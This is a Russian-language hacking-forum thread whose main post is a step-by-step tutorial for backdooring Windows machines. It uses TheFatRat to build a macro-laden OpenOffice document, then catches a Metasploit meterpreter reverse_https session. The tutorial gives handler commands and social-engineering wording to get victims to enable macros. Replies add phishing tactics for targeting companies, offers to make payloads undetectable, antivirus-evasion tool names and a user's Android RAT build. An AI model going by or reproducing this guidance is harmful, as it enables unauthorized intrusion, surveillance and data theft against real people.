Новости Авторская статья - TheFatRat взлом Windows через OpenOffice

Тема в разделе "Пентестинг", создана пользователем sipe, 31 июл 2017.

  1. sipe

    sipe

    Сообщения:
    17
    Баллы:
    1
    примерно также распросторонялся вирус "петя"
  2. 4ERT

    4ERT RICH-BOSS Команда форума Модератор форума VIP Внесен депозит 4000$

    Сообщения:
    856
    Баллы:
    18
    Сегодня мы поговорим о том, как с помощью инструмента TheFatRat можно взломать любой компьютер на Windows.

    OpenOffice -это бесплатная альтернатива Microsoft Office. Не так много, кто использует эту программу, но в небольших фирмах, университетах вынуждены пользоваться именно ей. В связи с тем, что нет бюджета на покупку официальной лицензии Microsoft, а нелицензионной пользоваться запрещено.
    Не используйте это в корыстных целях, чтобы рассылать вирус по почтам фирм, людей, взломать и получить всю нужную, интересную информацию. Здесь все представлено лишь для ознакомления.
    The Fat Rat - Backdoor для удаленного доступа. Использовать мы его будем на Kali Linux.


    Установка
    Код:
    git clone https://github.com/Screetsec/TheFatRat
    cd TheFatRat/
    bash setup.sh
    Дожидаемся окончания установки и запускаем TheFatRat из консоли командой:
    Код:
    fatrat
    Можете ознакомиться и протестировать все приведенные способы взлома. Но те, что подписаны FUD, уже детектятся 10-20 антивирусами, в том числе и вирус Microsoft Office.


    Создание вируса
    http://s018.radikal.ru/i519/1707/db/eb0f77e2c0ca.png

    Вводим
    Код:
    7
    http://s010.radikal.ru/i311/1707/67/347151109b86.png

    Вводим
    Код:
    4
    и ваш IPV4 адрес, любой неиспользуемый порт, затем название документа
    http://s019.radikal.ru/i623/1707/9f/33215ab796fa.png

    Выбираем полезную нагрузку, например, 6.
    http://i057.radikal.ru/1707/a5/ebab362f6e8a.png

    Все, ваш файл готов по указанному пути. Отправляйте жертве.
    http://s019.radikal.ru/i611/1707/25/7f6d4ac81aef.png


    Взлом
    Далее мы должны подождать пока сессия откроется. Используем metasploit.
    Код:
    msfconsole
    msf > use multi/handler
    msf exploit (handler) > set payload windows/meterpreter/reverse_https
    msf exploit (handler) > set LHOST (свой внутренний IP)
    msf exploit (handler) > set LPORT 443
    msf exploit (handler) >exploit
    http://s018.radikal.ru/i500/1707/f1/441a6c9ee56b.png

    Когда файл на компьютере жертвы будет запущен, вы увидите что открылась сессия meterpreter.

    Рассылая письмом под видом важного документа, необходимо использовать СИ, чтобы разрешили запуск макросов. К примеру, "в документе приведены расчеты за каждый месяц 2017 года. Для автоматического запуска расчетов необходимо разрешить выполнение макросов. "
    Ну и все. А дальше делать в консоли можно все, что захотите. Скачивайте, скриньте итп.
    Детект вируса 2/38 http://viruscheckmate.com/id/5TXbflBsk9Sx
  3. barbus

    barbus

    Сообщения:
    2
    Баллы:
    1
    Попробуем на WIFI SLAX
  4. Izj.GoMoney

    Izj.GoMoney RICH-BOSS Команда форума Модератор форума Внесен депозит 500$

    Сообщения:
    1.456
    Баллы:
    38
    Как всегда- Великолепно!
  5. Izj.GoMoney

    Izj.GoMoney RICH-BOSS Команда форума Модератор форума Внесен депозит 500$

    Сообщения:
    1.456
    Баллы:
    38
    Писать желательно, под заключение договора. Плюс несколько писем ни о чём: прайс попросить,
    как с кризисом борются, телефон спросить главного или кто это курирует. Пару раз позвонить о времени СОГЛАСОВАНИЯ и т.п. Это расчистит дорогу СИ и повысит доверие.
    Бывает при первоначальном заключении договоров требуют Выписку с ЕГЮРЛ, ОГРН,ИНН,УСТАВ, приказ о назначении. С этой толпой доков с разными расширениями( PDF, сканы, Ворд ) можно отправиь свой сюрприз))
  6. nullSafeness

    nullSafeness

    Сообщения:
    244
    Баллы:
    16
    Могу сделать чистку, тупо FUD, в лс
  7. 4ERT

    4ERT RICH-BOSS Команда форума Модератор форума VIP Внесен депозит 4000$

    Сообщения:
    856
    Баллы:
    18
    В кали есть свои инструменты, спасибо
  8. Raskolnikov

    Raskolnikov

    Сообщения:
    286
    Баллы:
    16
    Заинтересован в этом. Есть какие-либо материалы почитать?
  9. 4ERT

    4ERT RICH-BOSS Команда форума Модератор форума VIP Внесен депозит 4000$

    Сообщения:
    856
    Баллы:
    18
    Смотря от какого антивируса нужно. Veil-evasion, shelter к примеру. В поиске есть.. Собиралась написать статьи по этому поводу. Пока руки не доходят
  10. Tema69

    Tema69

    Сообщения:
    59
    Баллы:
    6
    А статьи то полезные будут, многим ведь лень что либо искать на просторах интернета, да и здесь также
  11. Tema69

    Tema69

    Сообщения:
    59
    Баллы:
    6
    Я вроде как о себе не говорил, читайте внимательнее!
  12. Izj.GoMoney

    Izj.GoMoney RICH-BOSS Команда форума Модератор форума Внесен депозит 500$

    Сообщения:
    1.456
    Баллы:
    38
    Да, я не прав. Извини, хотя много таких кому предназначено!
  13. Tema69

    Tema69

    Сообщения:
    59
    Баллы:
    6
    Не спорю, я о них и сам писал
  14. Sochi23

    Sochi23

    Сообщения:
    20
    Баллы:
    1
    Отлично!!! как швейцарские часы работает, но при отправке sms невозможно поставить пробел\ жесть как плохо!!!!!
  15. 4ERT

    4ERT RICH-BOSS Команда форума Модератор форума VIP Внесен депозит 4000$

    Сообщения:
    856
    Баллы:
    18
    Вроде бы вы ошиблись темой
  16. Sochi23

    Sochi23

    Сообщения:
    20
    Баллы:
    1
    вроде нет. я этой крысой арк сделал, msfconsole meterpreter все дела. доступ к андрюше == но вот беда, то что надо было не работает. спасибо огромное крыса хороша!!!
  17. 4ERT

    4ERT RICH-BOSS Команда форума Модератор форума VIP Внесен депозит 4000$

    Сообщения:
    856
    Баллы:
    18
    аа, вы вобщем про FatRat)
  18. Sochi23

    Sochi23

    Сообщения:
    20
    Баллы:
    1
    Да конечно я об этой крысе, она хороша
  19. Sochi23

    Sochi23

    Сообщения:
    20
    Баллы:
    1
    Еще раз Здрасте! вот как всегда победишь одно, так другое вылезет: случайно не подскажите в каком направление двигаться, TheFatRat создал арк, но необходимо криптонуть, тут я и тону в море инфо, а толку нет)))
  20. yarr

    yarr

    Сообщения:
    323
    Баллы:
    18
    Ты не в той теме вопрос задал. Крипт апк тема специфическая, обычно это ручками делают, а потому дороговато. Если только обфусцировать.

Поделиться этой страницей

Top